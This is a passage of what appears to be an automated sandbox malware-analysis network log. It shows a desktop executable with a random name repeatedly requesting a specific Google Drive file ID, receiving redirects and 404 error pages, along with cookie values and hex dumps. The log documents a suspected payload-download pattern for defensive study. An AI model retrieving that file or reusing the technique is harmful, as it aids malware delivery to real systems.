2024-12-03 16:26:13 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:14 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:13 GMT Content-Security-Policy: script-src 'nonce-qN0EOC1nkznqPMHC5H4CwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC6e3vQNlkqAnAUNL2HM9xixg4Q8hqxab00eFSxbfE0KmhrjA2tCiAHuc60PDK5w9p42DmKHsPTIdg Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:26:14 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 41 61 6b 77 5f 39 54 71 67 43 57 66 49 57 2d 55 73 41 2d 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QAakw_9TqgCWfIW-UsA-Aw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49971	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:16 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:17 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:16 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-wfGhW7iknOSQ4dcG6i4Bng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49972	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:18 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:19 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:19 GMT Content-Security-Policy: script-src 'nonce-uQnJiq9ftKYWIFgJSKS7ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC4KK_QXxtN71vNgIHyHNOnVpkJv2vMEDcGcsNKDoqjJKAyAlMXr4ryhn6sANgft83lIaHj9KmjXjA Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:26:19 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 6a 2d 6c 4d 6b 4c 70 44 57 4f 4a 61 59 59 5f 78 69 46 6d 79 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Xj-lMkLpDWOJaYY_xiFmyw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49973	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:21 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:22 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:22 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-e3-xdlm5mSNb0rJ9T-5rhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49974	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:24 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:25 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:25 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-G1sjsUQBpFxkqgdo00w9rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC5uR8lsNnRvlGgfeXXGdwzVFx5uF-sejHIkH3uXWr-l-67McK6aGeqJ8bUNyBtuk_oMZF5fRihGmA Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:26:25 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 66 64 4e 5f 68 59 4f 79 50 32 75 6c 46 4f 57 69 48 62 56 72 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yfdN_hYOyP2ulFOWiHbVrQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49975	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:27 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:28 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:27 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-LPUFyIibe9QQV5035bI0AA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49976	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:29 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:30 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:30 GMT Content-Security-Policy: script-src 'nonce-wQUTh5tMvCUH6jfTn9a2gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC7aVP3m36V3K72LO1xnjhEHY_JxMjWLvId9f9M4AcNUKPUpG5zfVC-3iOGXpCe6tCHanTWSlTq95g Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:26:30 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 4e 2d 68 57 4e 43 75 66 61 59 38 73 71 70 4b 6f 44 39 61 72 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uN-hWNCufaY8sqpKoD9arg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49977	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:32 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:33 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:33 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-5Tjn3lSLH6xfvRsE3pgzGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49978	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
